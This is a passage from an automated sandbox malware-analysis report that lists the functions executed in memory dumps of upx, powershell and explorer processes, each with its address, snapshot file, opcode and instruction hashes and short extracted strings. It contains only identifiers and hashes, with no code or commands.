                                                                                        • Opcode Fuzzy Hash: dbbbc11c1d816ad4392ba9161479b132941217cff0de04381e3ac873f3f3db44
                                                                                        • Instruction Fuzzy Hash: 3F31253294EBC94FE363A72818651617FF1DF96250B0901F7D648CB1E7DB0C9C0A8366

                                                                                        Executed Functions

                                                                                        Function 02960978 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2133502183.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_2960000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a227cbb09bee4e9ef7b3c4265592664ce817bd9ad4b040a2a615666c27351e7c
                                                                                        • Instruction ID: 501ec40f741813fbf08355950eeb4aca8f67a942b0fa2c258cdcc61cf054f763
                                                                                        • Opcode Fuzzy Hash: a227cbb09bee4e9ef7b3c4265592664ce817bd9ad4b040a2a615666c27351e7c
                                                                                        • Instruction Fuzzy Hash: E3212674D0520ADBDB00DFA9C5897BEFBF6BB49300F14D565C406A3292D7349A81CB90
                                                                                        Function 029608C1 Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2133502183.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_2960000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf9527b6f001e9d680b458b32c2d82ffa710ad6f9f35451962baf92131b58dbb
                                                                                        • Instruction ID: 17ec8af72e1461c5855c1bfd397f650eff7cd271245c3545655a6b758d786793
                                                                                        • Opcode Fuzzy Hash: bf9527b6f001e9d680b458b32c2d82ffa710ad6f9f35451962baf92131b58dbb
                                                                                        • Instruction Fuzzy Hash: 9E115A70D45209AFCB09DFB9C895AAEBBB1FF46304F1084AEC418A7251EB359945CF62
                                                                                        Function 029608D0 Relevance: .0, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2133502183.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_2960000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ebbaf30ddcb1a255790be56b1008517812ed5bff814db07dee2ce95d2d28b3f5
                                                                                        • Instruction ID: 0a8cc181e7de82aa5f1539d0a82e423f350116b24bf787264b6964a267863385
                                                                                        • Opcode Fuzzy Hash: ebbaf30ddcb1a255790be56b1008517812ed5bff814db07dee2ce95d2d28b3f5
                                                                                        • Instruction Fuzzy Hash: 4B011770D41209AFCB48EFB9C8546BEBBB6FF45304F1088A9C418A7250EB359A41CF92
                                                                                        Function 02960968 Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2133502183.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_2960000_upx.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 119764ee362d2eca5e15f98e86bf946b8104f56fdf9e5247b1f0ca3b45be507e
                                                                                        • Instruction ID: 8d4dabb2652fba1ac9b6ab10d2de0e52233f932deb8c2a1e2f3f1e0698480205
                                                                                        • Opcode Fuzzy Hash: 119764ee362d2eca5e15f98e86bf946b8104f56fdf9e5247b1f0ca3b45be507e
                                                                                        • Instruction Fuzzy Hash: DE011271D092458FDB05DF65C5483EDBFF6BB9A300F14D566C405A7292D3344A45CB91

                                                                                        Executed Functions

                                                                                        Function 00007FF848FD6605 Relevance: 6.7, Strings: 5, Instructions: 427COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2309707430.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848fd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (B!I$(B!I$(B!I$(B!I$(B!I
                                                                                        • API String ID: 0-3547137269
                                                                                        • Opcode ID: 37e0d8c4273f234cb1fedb13002cf0870a4b6b47ab43fd6f075dea7c5cc8171a
                                                                                        • Instruction ID: 5d770053e0709ea7ad6ace07211b21926ddded87cae227164ffed4cdeae53afb
                                                                                        • Opcode Fuzzy Hash: 37e0d8c4273f234cb1fedb13002cf0870a4b6b47ab43fd6f075dea7c5cc8171a
                                                                                        • Instruction Fuzzy Hash: 96C11231D0EA8A5FEBA5EB2898155B57BE0FF16350F1801BAD50ECB0D3EB1CA805C795
                                                                                        Function 00007FF848FD6807 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2309707430.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848fd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (B!I
                                                                                        • API String ID: 0-3024350644
                                                                                        • Opcode ID: cf03224465fe06cb77a8b8a7e890edd32bc41fbc5cd387bb98b9472f358eb01c
                                                                                        • Instruction ID: 239e83332012902b172d44b83f04070be070858694f7b4ae7a0300e0a3666530
                                                                                        • Opcode Fuzzy Hash: cf03224465fe06cb77a8b8a7e890edd32bc41fbc5cd387bb98b9472f358eb01c
                                                                                        • Instruction Fuzzy Hash: 1B110431E0D68A8FE755EB5890941B8B3D1EF14351F2480BEC20EC70C3EF1C68458794
                                                                                        Function 00007FF848F09EE0 Relevance: .3, Instructions: 269COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f8d41d18d31a28b3e7392824915a703144b499e546c61711ca23de319cce960
                                                                                        • Instruction ID: e67c1fa7c05103cb2049553d63fab1d47ba8ecd143054c58da8f8dc58b734488
                                                                                        • Opcode Fuzzy Hash: 4f8d41d18d31a28b3e7392824915a703144b499e546c61711ca23de319cce960
                                                                                        • Instruction Fuzzy Hash: 80716E77D0D9958FE316AB3CA8550E53BA0FF527AAF0800B7D18C8A0D3FF185C668695
                                                                                        Function 00007FF848F0B2AA Relevance: .2, Instructions: 239COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 910e0cdd67aa74d5eeeb5246cde89cc19c0145664f05fe42274360751ee665c2
                                                                                        • Instruction ID: a65b51c9a18fb9eadcc8cb7f3fe8f547842e0a8c90fa6680c00544fe39e266b7
                                                                                        • Opcode Fuzzy Hash: 910e0cdd67aa74d5eeeb5246cde89cc19c0145664f05fe42274360751ee665c2
                                                                                        • Instruction Fuzzy Hash: BF714970A2DB884FE349EF2884996B9BBE1FF52341F1400BDD08AC71D7DB25A846CB11
                                                                                        Function 00007FF848F0B238 Relevance: .2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0f9c7847f970b7c165d1b0ff0aa6311b61496aa010f8606371005905eba46b7
                                                                                        • Instruction ID: 748289979189a4c958719263c0a365f4719c0924beb134d8a1a892e9db9cc8b9
                                                                                        • Opcode Fuzzy Hash: b0f9c7847f970b7c165d1b0ff0aa6311b61496aa010f8606371005905eba46b7
                                                                                        • Instruction Fuzzy Hash: C4414A7081DBC85FE716DB688C4A9B57FE4DF13320F0841AED489CB1A3D664680BC762
                                                                                        Function 00007FF848F096FA Relevance: .2, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9022bde069fd5627a9b441bbf673f9e12b6def03d1fa119bbf5c3b15861d5321
                                                                                        • Instruction ID: 961a4597ad97bc501f7c8a761ff2aad89be93937e7c7504c8fb2fadd39264908
                                                                                        • Opcode Fuzzy Hash: 9022bde069fd5627a9b441bbf673f9e12b6def03d1fa119bbf5c3b15861d5321
                                                                                        • Instruction Fuzzy Hash: 2951F731E0CB858FD7199B28A8156B97BE0FF56750F14417FD04883293EB24A816C7C6
                                                                                        Function 00007FF848F09FD3 Relevance: .2, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3696f5c78eceea3d778ad8ac18a60dbff3d832eb7eb641d62cefb3f5337cbe0
                                                                                        • Instruction ID: b035cd3c1b5d75fc66dacf602319b15d54be25003002ee162888ea37095cc941
                                                                                        • Opcode Fuzzy Hash: a3696f5c78eceea3d778ad8ac18a60dbff3d832eb7eb641d62cefb3f5337cbe0
                                                                                        • Instruction Fuzzy Hash: 4B41D47BD0DD968EE316AB3CA8550E53B90FF62B96F1800B6D088860D3FF195C968685
                                                                                        Function 00007FF848DEED40 Relevance: .1, Instructions: 126COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2307998779.00007FF848DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ded000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c0d9ccf915b406f2d6bd647d81190b4fd5e4a1cd79c1ef192e47e3cd4152c2da
                                                                                        • Instruction ID: 575b00a15a3ed20f664418075980f2c818ef2fe487c24aa6b7c5d4b61bfc3918
                                                                                        • Opcode Fuzzy Hash: c0d9ccf915b406f2d6bd647d81190b4fd5e4a1cd79c1ef192e47e3cd4152c2da
                                                                                        • Instruction Fuzzy Hash: 1A41D87180EBC44FD7569B299845A623FF0EF57260F1905DFD088CB1A3D729A849C7A2
                                                                                        Function 00007FF848FD414D Relevance: .1, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2309707430.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848fd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78aed3c6c9690c67b9d36a5825c0debec6d12dea0bee3c9b039186144c22f80a
                                                                                        • Instruction ID: 32d3afbac8640359770fe8c8464d5719a883d05a84b31b72333b5f11ab17ba68
                                                                                        • Opcode Fuzzy Hash: 78aed3c6c9690c67b9d36a5825c0debec6d12dea0bee3c9b039186144c22f80a
                                                                                        • Instruction Fuzzy Hash: 7121B032B0CA088FEB59EB1CA4015E8B7E1EB69361F1411BBD24AC3193DB25EC45C795
                                                                                        Function 00007FF848FD4400 Relevance: .1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2309707430.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848fd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 546f0fadd3fe61af56dec2946bd7daa2303f295585cb6b8e3850813f09706699
                                                                                        • Instruction ID: ff65f191ca86da3e15207e35af3a987aa7ba245b63dddf8c687710d52e792c2a
                                                                                        • Opcode Fuzzy Hash: 546f0fadd3fe61af56dec2946bd7daa2303f295585cb6b8e3850813f09706699
                                                                                        • Instruction Fuzzy Hash: B8219F32B0CA088FEB58EB1CA4415E8B7E0EF59761F1400BBD64AC7193DB25E8558795
                                                                                        Function 00007FF848F033B5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                                        • Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
                                                                                        • Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                                        • Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45

                                                                                        Non-executed Functions

                                                                                        Function 00007FF848F08995 Relevance: 5.1, Strings: 4, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: O_^$O_^$O_^$O_^
                                                                                        • API String ID: 0-934926442
                                                                                        • Opcode ID: 849a35280176a1928d97bc5c6645f84bac251ea3ec7ba91f830657e9c7a605dd
                                                                                        • Instruction ID: 4cfc71772326e11e807f7b5848571ba2590d0048204edc50d93eb0bf2b17ef5e
                                                                                        • Opcode Fuzzy Hash: 849a35280176a1928d97bc5c6645f84bac251ea3ec7ba91f830657e9c7a605dd
                                                                                        • Instruction Fuzzy Hash: D741F076D1E6C26FE30AA7285C650A53FA0FF537A5B4D00F6C0888F1D3FE1C580A9255
                                                                                        Function 00007FF848F08BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2308845028.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f00000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: O_^4$O_^7$O_^F$O_^J
                                                                                        • API String ID: 0-875994666
                                                                                        • Opcode ID: 20e8c86c78f39619545557bfa8f1b31d7e97040b85d5d36bf3b4b000466823a0
                                                                                        • Instruction ID: 8bd8163f0f9ae516a15f916a4231b8f7fb71d175f1a7c6e4fa1c9a0ae69dd810
                                                                                        • Opcode Fuzzy Hash: 20e8c86c78f39619545557bfa8f1b31d7e97040b85d5d36bf3b4b000466823a0
                                                                                        • Instruction Fuzzy Hash: E521297762A025DED3417B7DB8045DA3750DFD427AB4502B2D19E8F243EA1C708686E4

                                                                                        Executed Functions

                                                                                        Function 00007FF848F40F73 Relevance: 4.0, Strings: 3, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HfH$XcH$@AD
                                                                                        • API String ID: 0-328263558
                                                                                        • Opcode ID: f083b5dd9690c7074bb65e42263f3e67202385cd8b58cd2b9a331993ee1524a6
                                                                                        • Instruction ID: fa9d7c52eaae8f3d1fd17fd0aa7c857a227135c4a10e661859869ae41a84b2ad
                                                                                        • Opcode Fuzzy Hash: f083b5dd9690c7074bb65e42263f3e67202385cd8b58cd2b9a331993ee1524a6
                                                                                        • Instruction Fuzzy Hash: 65710B32F1895A4FE2A8FA1C945527A63E2EFE4750F05013FD84EE73D6DE24AC068781
                                                                                        Function 00007FF848F4F776 Relevance: 3.1, Strings: 1, Instructions: 1819COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )6=
                                                                                        • API String ID: 0-1644579768
                                                                                        • Opcode ID: 9ac42b6f8bc57dc75432d206a2e23a3ff69c584af2ff837be035281cad3f4d28
                                                                                        • Instruction ID: 85c39655b6717b1f5900f66a24e3430af075d20c9630718b7e5f69ded345d8b4
                                                                                        • Opcode Fuzzy Hash: 9ac42b6f8bc57dc75432d206a2e23a3ff69c584af2ff837be035281cad3f4d28
                                                                                        • Instruction Fuzzy Hash: 59C2F531E1C5298FEB5CEB188855679B3E1FB95740F1501BDD88EE72D2DF28AC428B84
                                                                                        Function 00007FF848F4F2CE Relevance: 1.7, Strings: 1, Instructions: 489COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: EK_H
                                                                                        • API String ID: 0-3026558219
                                                                                        • Opcode ID: ac1cec82e532e43f1e545046fb5ba1a48bbca42ce1b866ff86b1b08b51a4d387
                                                                                        • Instruction ID: e04dc648eb0589d4735e74f765d1f0f1ae063f2a78b162068c0baeb247e88b31
                                                                                        • Opcode Fuzzy Hash: ac1cec82e532e43f1e545046fb5ba1a48bbca42ce1b866ff86b1b08b51a4d387
                                                                                        • Instruction Fuzzy Hash: 14E1E531E285194FE75CEA2C984517873E1FB99740F1512BED88FE72D3DE24AC428B85
                                                                                        Function 00007FF848F49EB3 Relevance: 1.7, Strings: 1, Instructions: 477COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HfH
                                                                                        • API String ID: 0-768170587
                                                                                        • Opcode ID: b92a2129faddc8d192789fed6ad2c955c12c4efed70b63df7ba699531fbf5b96
                                                                                        • Instruction ID: a09adfd5901a7cb7aae99cbe1e5c6f0ab4340d2f50e069c91da9ec5f2d2104d6
                                                                                        • Opcode Fuzzy Hash: b92a2129faddc8d192789fed6ad2c955c12c4efed70b63df7ba699531fbf5b96
                                                                                        • Instruction Fuzzy Hash: 2AE10331F1852A4FE75CEB28884567972E2FB65B40F14407ED88FE72D7DE28AC428685
                                                                                        Function 00007FF848F4A77D Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `MH
                                                                                        • API String ID: 0-1881654037
                                                                                        • Opcode ID: 3e1ed32f01ef15bb41e65e70e34cf31a90ad816090d3a32d957218a48be0d44e
                                                                                        • Instruction ID: ef8e5e8deb90a7b912329618dd344e094960eab0ec19a42398214f9482dc42cc
                                                                                        • Opcode Fuzzy Hash: 3e1ed32f01ef15bb41e65e70e34cf31a90ad816090d3a32d957218a48be0d44e
                                                                                        • Instruction Fuzzy Hash: 77A14631A1DA554FE31CA62CA40217177D1EBA6B50F2542BEE8CFD72C7DE18AC5382C9
                                                                                        Function 00007FF848F4C8CE Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $k"
                                                                                        • API String ID: 0-3172281777
                                                                                        • Opcode ID: 4c39ce39b7dd3c532e9ee5edb0aa80df11e45a57970f9331b7204b2e231c786c
                                                                                        • Instruction ID: f8dc817439f2a77102ed3e18d7caba7032be74eb603187c776cac94e35633f5d
                                                                                        • Opcode Fuzzy Hash: 4c39ce39b7dd3c532e9ee5edb0aa80df11e45a57970f9331b7204b2e231c786c
                                                                                        • Instruction Fuzzy Hash: 4D712532E2C5154FE24CAB2C940617477D1FB55B50B5912BEE88BE72E3DE29AC0382C9
                                                                                        Function 00007FF848F490FD Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -Y.
                                                                                        • API String ID: 0-4065341320
                                                                                        • Opcode ID: 9151356f484227d1c8392ca9659cfb48969a6f075e87dd79d501cfc9de28d940
                                                                                        • Instruction ID: 8fc8832b4445c458d866f1a2374e8c8b319f1fec588fb5062e383a90dfa6c3f6
                                                                                        • Opcode Fuzzy Hash: 9151356f484227d1c8392ca9659cfb48969a6f075e87dd79d501cfc9de28d940
                                                                                        • Instruction Fuzzy Hash: DC414733B1CA460FD348993D8845061B7E3ABD425435A837AD497CB7E6EE38E91B8781
                                                                                        Function 00007FF848F51A76 Relevance: .5, Instructions: 451COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3b59aa91648fabf3a3b85f35a08b5dda1bfddd1d2d6d540df7a95c6d9ae07fbd
                                                                                        • Instruction ID: 447ec9ad87f9375b5a7ab82d3019242531285e7a633ef0c27445525be87201e6
                                                                                        • Opcode Fuzzy Hash: 3b59aa91648fabf3a3b85f35a08b5dda1bfddd1d2d6d540df7a95c6d9ae07fbd
                                                                                        • Instruction Fuzzy Hash: 31E18F30A1CA0D8FDB9CEF2888556A9B3E2FB95344F10417ED44ED7297DE34AD828B45
                                                                                        Function 00007FF848F492D5 Relevance: .2, Instructions: 248COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7ab8cc6ea1033e4ae32e84d27ee378e34879448e875614e9debeb5329b4b7d65
                                                                                        • Instruction ID: 1683593166b5727ad666cd32809e51075371e12c27145072121abdaa5edb75cc
                                                                                        • Opcode Fuzzy Hash: 7ab8cc6ea1033e4ae32e84d27ee378e34879448e875614e9debeb5329b4b7d65
                                                                                        • Instruction Fuzzy Hash: E3A10770E0A60D9FDB99DF58E595AACB7F2EF59340F1040AAE00AE77A1DB346D45CB00
                                                                                        Function 00007FF848F51C49 Relevance: .2, Instructions: 181COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a645d1bff8e6854c7be0ebeeffba6761bc50b70f49380146070404366d4ddf6b
                                                                                        • Instruction ID: 43ea4135d8f30d854762ae1a023106f7b379ae98de098be5b154eadea486d33d
                                                                                        • Opcode Fuzzy Hash: a645d1bff8e6854c7be0ebeeffba6761bc50b70f49380146070404366d4ddf6b
                                                                                        • Instruction Fuzzy Hash: 3B51AE30A186098FDB9CEF1888556B9B3E1FB95309F50817ED44ED7292DF34AD86CB84
                                                                                        Function 00007FF848F40CD5 Relevance: 4.0, Strings: 3, Instructions: 235COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HfH$XcH$@AD
                                                                                        • API String ID: 0-328263558
                                                                                        • Opcode ID: 6cbc2aeee39645c783838dcfdc5ca81b451dde558e0fabc1c0b3a1ce00a74851
                                                                                        • Instruction ID: 0af9e2258dcb71f128df76ea13a666304981eed1d0ac854a1902d6d1c5578fab
                                                                                        • Opcode Fuzzy Hash: 6cbc2aeee39645c783838dcfdc5ca81b451dde558e0fabc1c0b3a1ce00a74851
                                                                                        • Instruction Fuzzy Hash: 65710632E1C9864FE2A4F72888552BA77E1FBE4751F05057BC84DE72D7DE28AC068781
                                                                                        Function 00007FF848F49C9C Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
